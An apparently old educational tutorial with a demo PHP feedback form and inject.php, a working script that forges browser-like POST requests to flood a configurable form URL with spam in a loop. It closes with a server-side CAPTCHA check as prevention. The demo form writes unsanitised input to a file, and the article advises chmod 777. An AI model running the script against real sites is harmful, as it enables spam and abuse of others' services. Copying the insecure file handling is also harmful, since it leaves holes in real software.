Introduction
This article shows how fake HTTP requests can be sent to a simple web form an unlimited number of times, resulting in the specified web form being spammed. Please note that this article is for educational use only. Respect the Internet community and don't do what I am about to show. It should help you understand how to prevent such injections.
Working example
form.php - the "dummy" form used for this presentation. In this example it is placed in /http_inject/form.php. It stores all submitted data in the form.txt file. Here's the source code of this file:
<?php
$var_date = date('Y').".".date('m').".".date('d');
$var_time = date('H').":".date('i').":".date('s');
if ( isset($_POST['submit']) ) {
    //$_POST is set and we are going to save a feedback to the file
    $handle = fopen("form.txt", "a");
    $write = "$var_date $var_time || {$_POST['username']} || {$_POST['subject']} || {$_POST['feedback']}\n";
    fwrite($handle, $write);
    fclose($handle);
    echo "thank you for your feedback";
} else {
    //print form
?>
<form name="feedback" method="post" action="<?php echo htmlspecialchars($_SERVER['PHP_SELF']); ?>">
<label>Your name: <input type="text" name="username" id="input_user" /> </label>
<br />
<label>Subject of the message: <input type="text" name="subject" id="input_subject" /> </label>
<br />
<label>Message: <textarea name="feedback" id="input_feedback"></textarea> </label>
<br />
<input type="submit" name="submit" id="input_submit" value="send" />
</form>
<?php }
?>
Make sure form.txt is writable by your web server (chmod 777).
inject.php - the script that sends the HTTP request to the form defined in its settings:
<?php
error_reporting(0);
set_time_limit(10);
//written by [lexx]

//set full path to your form
$_settings['url'] = "http://localhost/_http_inject/form.php";

//set all field names and values to this array.
//you may add or remove any of these items, depending on your form requirements
$_forms['username'] = "Mr.Spammer";
$_forms['subject'] = "Total_spam";
$_forms['feedback'] = "goto%20http%3A%2F%2Fwww.google.com%2F";
$_forms['submit'] = "send";

//number of injects
$injects_no = 10;

/*NO NEED TO CHANGE FURTHER DATA*/

//parsing url
$_settings = parse_url($_settings['url']);
if ( !isset($_settings['port']) ) {
    $_settings['port'] = 80;
}

//performing injects
$counting = 0;
while ($counting < $injects_no) {
    http_inject();
    $counting++;
}

function http_inject() {
    global $_settings;
    global $_forms;

    //create POST STRING
    $request_body = NULL;
    $count = 0;
    foreach ($_forms as $key => $item) {
        $request_body .= "$key=$item";
        //add &
        if ( $count <= count($_forms)-2 ) {
            $request_body .= "&";
        }
        $count++;
    }

    //create headers
    $request_headers = NULL;
    $request_headers .= "POST {$_settings['path']}".( isset($_settings['query']) ? "?{$_settings['query']}" : "" )." HTTP/1.1\r\n";
    $request_headers .= "Host: {$_settings['host']}\r\n";
    $request_headers .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1b1) Gecko/20060707 Firefox/2.0b1\r\n";
    $request_headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
    $request_headers .= "Accept-Language: lt,en-us;q=0.7,en;q=0.3\r\n";
    $request_headers .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
    $request_headers .= "Connection: close\r\n";
    $request_headers .= "Referer: {$_settings['scheme']}://{$_settings['host']}{$_settings['path']}".( isset($_settings['query']) ? "?{$_settings['query']}" : "" )."\r\n";
    $request_headers .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $request_headers .= "Content-Length: ".strlen($request_body)."\r\n";
    $request_headers .= "\r\n";

    //open socket
    $socket_handle = fsockopen($_settings['host'], $_settings['port'], $errno, $errstr, 30);
    if ( !$socket_handle ) {
        //connection failed, nothing to send
        return;
    }
    //send request+body
    fwrite($socket_handle, $request_headers.$request_body, strlen($request_headers)+strlen($request_body) );

    //read response if we want
    /*
    do {
        $responce_body .= fread($socket_handle, 1024);
    } while( !feof($socket_handle) );
    echo $responce_body;
    */

    //close socket
    fclose($socket_handle);
}
?>
How it works
First of all, inject.php builds a dummy HTTP request header, pretending to be a web browser that is submitting a form to the server. If the server does not have any protection mechanisms installed, the form is "submitted". Moreover, you can specify the number of injects in inject.php, so you can perform multiple attacks in one execution.
Prevention
The most efficient way to prevent such "automated submits" is to install a random image generator: the image shows a short phrase, and the user must type that phrase into a special field of the form (most forums have this). On submit, the server checks whether the text in the special input field is the same as the text written in the image. If yes, the form is processed; if no, the user receives a warning that all the fields must be filled in correctly.
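The check described under Prevention, as an added example that is not part of the original article: a variant of form.php in which the phrase lives only in the server-side session, is valid for a single submit, and is compared when the form is posted. The "captcha" field name, the ?img=1 parameter and both function names are assumptions; it needs PHP 7 or later with the GD extension.

```php
<?php
// Added example, not the article's code. The "captcha" field, the ?img=1
// parameter and both function names are assumptions made for illustration.
session_start();
function issue_challenge() {
    $alphabet = 'ABCDEFGHJKLMNPQRSTUVWXYZ23456789'; // no look-alike 0/O, 1/I
    $phrase = '';
    for ($i = 0; $i < 5; $i++) {
        $phrase .= $alphabet[random_int(0, strlen($alphabet) - 1)];
    }
    return $_SESSION['challenge'] = $phrase; // kept on the server only
}
function verify_challenge($submitted) {
    $expected = isset($_SESSION['challenge']) ? $_SESSION['challenge'] : null;
    unset($_SESSION['challenge']); // single use: a replayed POST finds nothing
    if (!is_string($expected) || !is_string($submitted)) {
        return false; // no session cookie, no phrase issued, or array input
    }
    return hash_equals($expected, strtoupper(trim($submitted)));
}
if (isset($_GET['img'])) { // requested by the <img> tag in the form below
    $img = imagecreate(90, 30);
    imagecolorallocate($img, 255, 255, 255); // first colour is the background
    $ink = imagecolorallocate($img, 0, 0, 0);
    imagestring($img, 5, 20, 7, issue_challenge(), $ink);
    header('Content-Type: image/png');
    header('Cache-Control: no-store');
    imagepng($img);
    exit;
}
if (!isset($_POST['submit'])) { ?>
<form method="post" action="<?php echo htmlspecialchars($_SERVER['PHP_SELF']); ?>">
<label>Your name: <input type="text" name="username" /></label><br />
<label>Subject of the message: <input type="text" name="subject" /></label><br />
<label>Message: <textarea name="feedback"></textarea></label><br />
<img src="?img=1" alt="challenge" />
<label>Text in the image: <input type="text" name="captcha" /></label><br />
<input type="submit" name="submit" value="send" />
</form>
<?php } elseif (!verify_challenge(isset($_POST['captcha']) ? $_POST['captcha'] : null)) {
    echo "please fill in all the fields correctly";
} else {
    $fields = array();
    foreach (array('username', 'subject', 'feedback') as $key) {
        $value = isset($_POST[$key]) && is_string($_POST[$key]) ? $_POST[$key] : '';
        $fields[] = str_replace(array("\r", "\n"), ' ', $value); // one record per line
    }
    $line = date('Y.m.d H:i:s') . ' || ' . implode(' || ', $fields) . "\n";
    file_put_contents('form.txt', $line, FILE_APPEND | LOCK_EX);
    echo "thank you for your feedback";
}
```

A request built the way inject.php builds it carries no session cookie and no "captcha" field, so verify_challenge() returns false and nothing is written to form.txt. The undistorted imagestring() text is only a stand-in for a real image generator; the part that matters is that the comparison happens on the server and each phrase is accepted once.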